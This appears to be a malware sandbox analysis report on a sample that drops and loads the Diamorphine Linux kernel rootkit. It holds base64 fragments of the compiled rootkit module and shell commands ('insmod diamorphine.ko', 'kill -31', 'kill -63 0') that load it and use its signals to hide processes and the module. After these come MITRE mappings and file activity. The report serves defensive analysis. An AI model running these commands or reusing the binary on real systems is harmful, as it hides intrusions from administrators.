IAQAAAAAAAAoAAAAAAAAAAEAAAADAAAAYAQAAAAAAAAwAAAAAAAAAAEAAAADAAAAgAQAAAAAAAA4

AAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAZQAAAAQAAABAAAAAAAAAAAAAAAAAAAAA+CQAAAAA

x0AQAAAAAEjHQBgAAAAASMdAIAAAAADoAAAAAF3DDx8A6AAAAABIi0dog/g/dCBVSInlg/hAD4SF

insmod diamorphine.ko

EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAEQAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAEwAAAAAAAAAA

__libc_start_main@@GLIBC_2.2.5

xwAAAABIieVIg+wQZUiLBCUoAAAASIlF+DHA6AAAAABBg8j/SIkFAAAAAEiFwA+E0gAAAP8UJQAA

AAAAAAAAWgAAAAEAAAAGAAAAAAAAAAAAAAAAAAAABggAAAAAAAB1AAAAAAAAAAAAAAAAAAAAAQAA

AAEAAAAwAAAAAAAAAAAAAAAAAAAAwBEAAAAAAABYAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAA

echo $(ps -aux | grep suspicious.sh) > hidden.txt

_ITM_deregisterTMCloneTable

aAIAAAAAAACzAAAAAAAAAAIAAAAOAAAAJAAAAAAAAADBAAAAAAAAAAIAAAAOAAAAHAAAAAAAAADP

perror@@GLIBC_2.2.5

AAAAAAAAAAAAAAAAAAAAAAAAAGRpYW1vcnBoaW5lLm1vZC5jAF9fVU5JUVVFX0lEX3NyY3ZlcnNp

AAAAAAAAAAAAAAAApwAAAAIAAwAAAAAAAAAAAEcAAAAAAAAAuwAAAAIAAwBQAAAAAAAAABAAAAAA

AAAAAAAAAAAAAAAs8vHOAAAAAGluaXRfdGFzawAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

.fini

AAAGBgAAAAAAAAIAAAAOAAAABAAAAAAAAAARBgAAAAAAAAQAAAAxAAAA/P////////8YBgAAAAAA

//+UAwAAAAAAAAQAAAA7AAAA/P////////+cAwAAAAAAAAQAAAAwAAAA/P/////////nAwAAAAAA

.init_array

_edata

AAAAAAAAAABTBQAAAAAAAAsAAAA1AAAAyAcAAAAAAABhBQAAAAAAAAQAAAA/AAAA/P////////9/

AAAAAAAAngEAAAEADgAlAAAAAAAAABUAAAAAAAAAtQEAAAAACwATAAAAAAAAAAAAAAAAAAAAugEA

__cxa_finalize

ZGlhbW9ycGhpbmUuYwBpc19pbnZpc2libGUucGFydC4wAGt6YWxsb2MuY29uc3Rwcm9wLjAAaGFj

BAAAAAAAAAsAAAA1AAAAAAAAAAAAAABKBAAAAAAAAAsAAAA1AAAAyAcAAAAAAABhBAAAAAAAAAQA

AAAIAQAAAAAAABgAAAAJAAAACAAAAAAAAAAYAAAAAAAAAHcAAAABAAAAMgAAAAAAAAAAAAAAAAAA

crtstuff.c

AAAIAAAAAAAAABgAAAAAAAAACQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAkBgAAAAAAAAdAwAAAAAA

AAAAAAAAAAAAAAAAAFUAAAAEAAAAQAAAAAAAAAAAAAAAAAAAAGgkAAAAAAAAkAAAAAAAAAAYAAAA

perror

WAIAABAAAAAAAAAAAAAAAAAAAAAAAAAAZgIAABAAAAAAAAAAAAAAAAAAAAAAAAAAewIAABIAAwAQ

AAAwAAAA/P////////8XAgAAAAAAAAQAAAAtAAAA/P////////8xAgAAAAAAAAQAAAAxAAAA/P//

AAAAAAAAAAAAAAAAAAAAAAAAGAIAABIABQAAAAAAAAAAACcBAAAAAAAAJAIAABAAAAAAAAAAAAAA

AAAAAAAAAAAAsBsAAAAAAAB4BgAAAAAAABgAAAADAAAACAAAAAAAAAAYAAAAAAAAAEoAAAABAAAA

AAAADAAAAAAAAAD1BQAAAAAAAAIAAAAsAAAABAAAAAAAAAD8BQAAAAAAAAsAAAAsAAAACAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAowADCQAAAAAAAAAAowADCQAAAAAAAAAA

__dso_handle

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQEr2oAAAAAcHZfb3BzAAAAAAAAAAAA

AAAA+gIAABIAAwBgBAAAAAAAABcAAAAAAAAABwMAABIAAwDQBQAAAAAAADsAAAAAAAAAEwMAABAA

AFVIieVBV0FWQVVBVFNIg+wQSItHaEyLb3BIiUXQSIsFAAAAAOgAAAAAhcAPjvkAAABMY/hBicRM

AAgAAAAAAAAAGQEAAAEAFQAIAAAAAAAAAAIAAAAAAAAAJwEAAAEAFQAQAAAAAAAAAAgAAAAAAAAA

LnRleHQALnJlbGEuZXhpdC50ZXh0AC5yZWxhX19tY291bnRfbG9jAC5yb2RhdGEuc3RyMS4xAC5y

AwAwAgAAAAAAAMgBAAAAAAAA/wAAAAEAFQAgAAAAAAAAAAgAAAAAAAAADwEAAAEAFQAYAAAAAAAA

AAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAABEAAAADAAAAAAAAAAAAAAAAAAAAAAAAAKgmAAAAAAAA

AAAAAADrAuawAAAAAG1lbW1vdmUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

snprintf

b240MgBfX1VOSVFVRV9JRF9kZXBlbmRzNDEAX19fX3ZlcnNpb25zAF9fVU5JUVVFX0lEX3JldHBv

GLIBC_2.2.5

AAAAAAAAAHUAAAAAAAAAbQEAAAEADgAAAAAAAAAAABgAAAAAAAAAiAEAAAEADgAYAAAAAAAAAA0A

AAAAAAAAAAAAAAMAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAEU6I+sAAAAAX19rbWFsbG9jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAEjHAAAAAAAxwF1miQUAAAAAww8fRAAA6AAAAABIiwUAAAAASIsVAAAAAFVIiQUAAAAASIlC

AAAOAAAADAAAAAAAAAClBQAAAAAAAAIAAAAsAAAABAAAAAAAAACwBQAAAAAAAAIAAAAsAAAADAAA

AExj+EGJxEyJ/+jc/f//SYnGTIn4TYX2D4TeAAAAMdJMif5MifdJY9zoAAAAAEiLddBMifpMiffo

cmVwYXJlX2NyZWRzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEHe

AAAAAAIAAAADAAAA9AMAAAAAAAAQAAAAAAAAAAIAAAApAAAABAAAAAAAAAB4AQAAAAAAAAEAAAAy

__libc_start_main

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

GLIBC_2.4

bml0AF9fc3lzX2NhbGxfdGFibGUAZGlhbW9ycGhpbmVfY2xlYW51cABfX1VOSVFVRV9JRF9kZXNj

AAAAAAQAAAAqAAAA/P////////+eAgAAAAAAAAQAAAArAAAA/P////////+vAgAAAAAAAAsAAAA5

X3RhYmxlAC5yZWxhLmdudS5saW5rb25jZS50aGlzX21vZHVsZQAuYnNzAC5jb21tZW50AC5ub3Rl

/lib64/ld-linux-x86-64.so.2

AAAAAAAAAAAAAAAAAAAAAAAAu237vQAAAABfX2ZlbnRyeV9fAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAPUAAAABAAAAAAAAAAAAAAAAAAAAAAAAABgSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAA

.dynamic

.strtab

AAAAAAAASMeCyAYAAAAAAABIx4LwAQAAAAAAAA8iwEUxwEiLRfhlSDMEJSgAAAB0BegAAAAAyUSJ

kill -31 $(pgrep -f suspicious.sh)

sleep 10

R1BMAHNyY3ZlcnNpb249RDIzNzZDNzdEMEIwOEI1MDY3RjlDRkIAZGVwZW5kcz0AcmV0cG9saW5l

kill -63 0

AAAAAACmAAAAAQAAAAIAAAAAAAAAAAAAAAAAAADgCQAAAAAAAEAEAAAAAAAAAAAAAAAAAAAgAAAA

AAQAAAAwAAAA/P////////+aAAAAAAAAAAIAAAAOAAAALAAAAAAAAAChAAAAAAAAAAIAAAAsAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAcAAAACAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAkAAAA

__GNU_EH_FRAME_HDR

__gmon_start__

AAEADgCDAAAAAAAAADcAAAAAAAAAkQAAAAEAAgAAAAAAAAAAABgAAAAAAAAAmQAAAAQA8f8AAAAA

libc.so.6

bGluZTQwAF9fVU5JUVVFX0lEX25hbWUzOQBfX1VOSVFVRV9JRF92ZXJtYWdpYzM4AF9ub3RlXzYA

LkdOVS1zdGFjawAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

.note.gnu.property

AAAAAAAAoAIAABAAAAAAAAAAAAAAAAAAAAAAAAAArgIAABAAAAAAAAAAAAAAAAAAAAAAAAAAtQIA

popen

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAR0NDOiAoVWJ1bnR1IDku

QA4AAAAAAACAAwAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAMgAAAAEAAAAQAAAAAAAAAAA

ANMIAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACLAAAAAQAAAAIAAAAAAAAA

AAAAAAAAAAAAAAAAAAIAAAADAAAAJAIAAAAAAAAEAAAAAAAAAAIAAAApAAAABAAAAAAAAAAMAAAA

AAAAAIXAD4XuAAAAZUiLBCUAAAAASIuAyAoAAE1j7UUx0kiLQCBIi0AISosE6EiLQBhIi0AwSIN4

lsmod > diamorphine-invisible.txt

frame_dummy

ZV9zaG93AF9fa21hbGxvYwAAAAABAAAAAAAAAAQAAAAxAAAA/P////////8JAAAAAAAAAAsAAAA1

Reports: JSON HTML Lite

Mitre ATT&CK

Defense Evasion
T1070 - Indicator Removal deletes_files T1070.004 - File Deletion deletes_files

Statistics (4.37)

Usage

Processing ( 1.64 seconds )

1.516 CAPE
0.057 StraceAnalysis
0.051 TraceeAnalysis
0.007 Heatmap
0.003 AnalysisInfo
0.002 NetworkAnalysis

Signatures ( 0.00 seconds )

Reporting ( 2.74 seconds )

2.687 MITRE_TTPS
0.044 ReportHTML
0.004 JsonDump
0.002 LiteReport

Signatures

Reads files from disk

ReadFile: /lib/x86_64-linux-gnu/libc.so.6

ReadFile: /lib/x86_64-linux-gnu/libtinfo.so.6

ReadFile: STDIN

ReadFile: /etc/ld.so.cache

ReadFile: /lib/x86_64-linux-gnu/libzstd.so.1

ReadFile: /lib/x86_64-linux-gnu/liblzma.so.5

ReadFile: /lib/x86_64-linux-gnu/libcrypto.so.3

ReadFile: /lib/modules/6.5.0-18-generic/modules.softdep

ReadFile: /proc/cmdline

ReadFile: /tmp7_5yn7x6/diamorphine.ko

ReadFile: /proc/modules

ReadFile: /sys/module/veth/refcnt

ReadFile: coresize

ReadFile: /sys/module/xt_conntrack/refcnt

ReadFile: /sys/module/nft_chain_nat/refcnt

ReadFile: /sys/module/xt_MASQUERADE/refcnt

ReadFile: /sys/module/nf_nat/refcnt

ReadFile: /sys/module/nf_conntrack_netlink/refcnt

ReadFile: /sys/module/nf_conntrack/refcnt

ReadFile: /sys/module/nf_defrag_ipv6/refcnt

ReadFile: /sys/module/nf_defrag_ipv4/refcnt

ReadFile: /sys/module/xfrm_user/refcnt

ReadFile: /sys/module/xfrm_algo/refcnt

ReadFile: /sys/module/xt_addrtype/refcnt

ReadFile: /sys/module/nft_compat/refcnt

ReadFile: /sys/module/nf_tables/refcnt

ReadFile: /sys/module/libcrc32c/refcnt

ReadFile: /sys/module/nfnetlink/refcnt

ReadFile: /sys/module/br_netfilter/refcnt

ReadFile: /sys/module/bridge/refcnt

ReadFile: /sys/module/stp/refcnt

ReadFile: /sys/module/llc/refcnt

ReadFile: /sys/module/overlay/refcnt

ReadFile: /sys/module/snd_hda_codec_generic/refcnt

ReadFile: /sys/module/ledtrig_audio/refcnt

ReadFile: /sys/module/snd_hda_intel/refcnt

ReadFile: /sys/module/snd_intel_dspcfg/refcnt

ReadFile: /sys/module/snd_intel_sdw_acpi/refcnt

ReadFile: /sys/module/snd_hda_codec/refcnt

ReadFile: /sys/module/snd_hda_core/refcnt

ReadFile: /sys/module/binfmt_misc/refcnt

ReadFile: /sys/module/snd_hwdep/refcnt

ReadFile: /sys/module/kvm_amd/refcnt

ReadFile: /sys/module/ccp/refcnt

ReadFile: /sys/module/nls_iso8859_1/refcnt

ReadFile: /sys/module/snd_pcm/refcnt

ReadFile: /sys/module/kvm/refcnt

ReadFile: /sys/module/irqbypass/refcnt

ReadFile: /sys/module/crct10dif_pclmul/refcnt

ReadFile: /sys/module/snd_seq_midi/refcnt

ReadFile: /sys/module/polyval_clmulni/refcnt

ReadFile: /sys/module/snd_seq_midi_event/refcnt

ReadFile: /sys/module/polyval_generic/refcnt

ReadFile: /sys/module/ghash_clmulni_intel/refcnt

ReadFile: /sys/module/aesni_intel/refcnt

ReadFile: /sys/module/snd_rawmidi/refcnt

ReadFile: /sys/module/crypto_simd/refcnt

ReadFile: /sys/module/cryptd/refcnt

ReadFile: /sys/module/snd_seq/refcnt

ReadFile: /sys/module/input_leds/refcnt

ReadFile: /sys/module/snd_seq_device/refcnt

ReadFile: /sys/module/snd_timer/refcnt

ReadFile: /sys/module/serio_raw/refcnt

ReadFile: /sys/module/snd/refcnt

ReadFile: /sys/module/soundcore/refcnt

ReadFile: /sys/module/qxl/refcnt

ReadFile: /sys/module/drm_ttm_helper/refcnt

ReadFile: /sys/module/ttm/refcnt

ReadFile: /sys/module/qemu_fw_cfg/refcnt

ReadFile: /sys/module/drm_kms_helper/refcnt

ReadFile: /sys/module/mac_hid/refcnt

ReadFile: /sys/module/sch_fq_codel/refcnt

ReadFile: /sys/module/msr/refcnt

ReadFile: /sys/module/parport_pc/refcnt

ReadFile: /sys/module/ppdev/refcnt

ReadFile: /sys/module/drm/refcnt

ReadFile: /sys/module/lp/refcnt

ReadFile: /sys/module/parport/refcnt

ReadFile: /sys/module/efi_pstore/refcnt

ReadFile: /sys/module/ip_tables/refcnt

ReadFile: /sys/module/x_tables/refcnt

ReadFile: /sys/module/autofs4/refcnt

ReadFile: /sys/module/crc32_pclmul/refcnt

ReadFile: /sys/module/ahci/refcnt

ReadFile: /sys/module/libahci/refcnt

ReadFile: /sys/module/psmouse/refcnt

ReadFile: /sys/module/i2c_i801/refcnt

ReadFile: /sys/module/e1000/refcnt

ReadFile: /sys/module/i2c_smbus/refcnt

ReadFile: /sys/module/lpc_ich/refcnt

Drops files onto disk

DroppedFile: diamorphine.ko

DroppedFile: diamorphine-invisible.txt

Writes to files on disk

WriteFile: STDOUT

WriteFile: diamorphine.ko

WriteFile: diamorphine-invisible.txt

Tracee: Kernel Modules and Extensions, MITRE T1547.006

Details: Check the Tracee tab for more information and to download the kernel modules.

Deletes files from disk

DeletedFile: "diamorphine.ko"

DeletedFile: "diamorphine-invisible.txt"

Screenshots

No screenshots available.

Session Playback

No playback available.

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

No results

Sorry! No behavior.

Sorry! No tracee.

Sorry! No strace.

Sorry! No tracee.

No hosts contacted.

No TCP connections recorded.

No UDP connections recorded.

No domains contacted.

HTTP Requests

No HTTP(s) requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No Suricata Extracted files.

Sorry! No dropped files.

Sorry! No process dumps.